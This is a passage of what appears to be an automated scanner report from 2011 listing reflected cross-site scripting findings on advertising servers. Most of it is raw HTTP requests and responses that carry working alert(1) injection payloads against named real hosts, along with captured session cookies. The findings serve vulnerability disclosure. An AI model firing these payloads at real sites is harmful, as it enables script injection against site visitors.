Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 09 May 2011 13:59:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:51 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501?6d6f8'-alert(1)-'b758fa577ec;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
3.13. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68e19'-alert(1)-'d718795e000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj68e19'-alert(1)-'d718795e000/q1.q.gc.6170/be_news;sz=300x250;net=q1;ord=949612198;ord1=727744;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:26 GMT
Connection: close
Content-Length: 7406

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-19898961_1304949626","http://ad.doubleclick.net/adj68e19'-alert(1)-'d718795e000/q1.q.gc.6170/be_news;net=q1;u=,q1-19898961_1304949626,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_m-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;cmw=owl;sz=300x250;net=q1;ord1=727744;contx=polit;dc=w
...[SNIP]...
3.14. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba0fc'-alert(1)-'5132246e024 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170ba0fc'-alert(1)-'5132246e024/be_news;sz=300x250;net=q1;ord=949612198;ord1=727744;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:26 GMT
Connection: close
Content-Length: 7398

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-67990008_1304949626","http://ad.doubleclick.net/adj/q1.q.gc.6170ba0fc'-alert(1)-'5132246e024/be_news;net=q1;u=,q1-67990008_1304949626,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_m-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=300x250;net=q1;ord1=727744;contx=polit;dc=w;btg=am.h;btg=am.b;bt
...[SNIP]...
3.15. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99f75'-alert(1)-'434975d6399 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/be_news99f75'-alert(1)-'434975d6399;sz=300x250;net=q1;ord=949612198;ord1=727744;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:26 GMT
Connection: close
Content-Length: 7398

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-54782015_1304949626","http://ad.doubleclick.net/adj/q1.q.gc.6170/be_news99f75'-alert(1)-'434975d6399;net=q1;u=,q1-54782015_1304949626,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_m-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=300x250;net=q1;ord1=727744;contx=polit;dc=w;btg=am.h;btg=am.b;btg=q1.pol
...[SNIP]...
3.16. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3363c'-alert(1)-'29286281e7c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/be_news;sz=3363c'-alert(1)-'29286281e7c HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:25 GMT
Connection: close
Content-Length: 7350

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
tachAd("q1-54258070_1304949625","http://ad.doubleclick.net/adj/q1.q.gc.6170/be_news;net=q1;u=,q1-54258070_1304949625,11f8f328940989e,none,q1.polit_h-q1.none_m-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=3363c'-alert(1)-'29286281e7c;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_m;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.ent_h;btg=cm.music_h?","3363c'-alert(1)-'29286281e7c","",false);</scr'+'ipt>
...[SNIP]...
3.17. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9676a'-alert(1)-'a645e4959d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj9676a'-alert(1)-'a645e4959d/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:59 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:59 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Content-Length: 7925

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-79836878_1304949599","http://ad.doubleclick.net/adj9676a'-alert(1)-'a645e4959d/q1.q.gc.6170/news;net=q1;u=,q1-79836878_1304949599,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_l-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;cmw=owl;sz=728x90;net=q1;ord1=275382;contx=polit;dc=w;btg
...[SNIP]...
3.18. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db5a3'-alert(1)-'52fdd678b0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170db5a3'-alert(1)-'52fdd678b0b/news;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:59 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:59 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Content-Length: 7918

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-31434394_1304949599","http://ad.doubleclick.net/adj/q1.q.gc.6170db5a3'-alert(1)-'52fdd678b0b/news;net=q1;u=,q1-31434394_1304949599,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_l-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=728x90;net=q1;ord1=275382;contx=polit;dc=w;btg=am.h;btg=am.b;btg=q1
...[SNIP]...
3.19. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52ba9'-alert(1)-'5fe36e29226 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/news52ba9'-alert(1)-'5fe36e29226;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:00 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 14:00:00 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 14:00:00 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 14:00:00 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 14:00:00 GMT
Content-Length: 7918

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-82061945_1304949600","http://ad.doubleclick.net/adj/q1.q.gc.6170/news52ba9'-alert(1)-'5fe36e29226;net=q1;u=,q1-82061945_1304949600,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_l-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=728x90;net=q1;ord1=275382;contx=polit;dc=w;btg=am.h;btg=am.b;btg=q1.poli
...[SNIP]...
3.20. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3685b'-alert(1)-'43c09f146d7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/news;sz=3685b'-alert(1)-'43c09f146d7 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:58 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:58 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Content-Length: 7872

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
dAttachAd("q1-64798750_1304949598","http://ad.doubleclick.net/adj/q1.q.gc.6170/news;net=q1;u=,q1-64798750_1304949598,11f8f328940989e,none,q1.polit_h-q1.none_l-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=3685b'-alert(1)-'43c09f146d7;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_l;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.ent_h;btg=cm.music_h?","3685b'-alert(1)-'43c09f146d7","",false);</scr'+'ipt>
...[SNIP]...
3.21. http://ad.doubleclick.net/adj/cm.tribune/uscell_ldev_300x600_05311 [net parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of the net request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9931f'%3balert(1)//b7beab04221 was submitted in the net parameter. This input was echoed as 9931f';alert(1)//b7beab04221 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune/uscell_ldev_300x600_05311;net=9931f'%3balert(1)//b7beab04221 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 298
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:03 GMT
Expires: Mon, 09 May 2011 14:00:03 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/u;44306;0-0;0;63773644;255-0/0;0/0/0;;~okv=;net=9931f';alert(1)//b7beab04221;~aopt=2/1/e454/0;~sscs=%3f"><img
...[SNIP]...
3.22. http://ad.doubleclick.net/adj/trb.orlandosentinel/biz [;ptype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.orlandosentinel/biz

Issue detail

The value of the ;ptype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7438'%3balert(1)//81202d971f6 was submitted in the ;ptype parameter. This input was echoed as c7438';alert(1)//81202d971f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.orlandosentinel/biz;;ptype=c7438'%3balert(1)//81202d971f6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2234
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:55 GMT
Expires: Mon, 09 May 2011 13:59:55 GMT

document.write('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<MobileCreative adId=\"236335382\" clientSideImpressionTracking=\"false\"\n templateVersion=\"1.2\">\n    <Properties>\n     <Cre
...[SNIP]...
<![CDATA[http://ad.doubleclick.net/imp;v7;j;236335382;0-0;0;12928091;2000/2000;40669971/40687758/1;;~aopt=2/1/880a/1;~okv=;;ptype=c7438';alert(1)//81202d971f6;~cs=a%3f]]>
...[SNIP]...
3.23. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0bfe"><script>alert(1)</script>10708fa3251 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=a0bfe"><script>alert(1)</script>10708fa3251 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
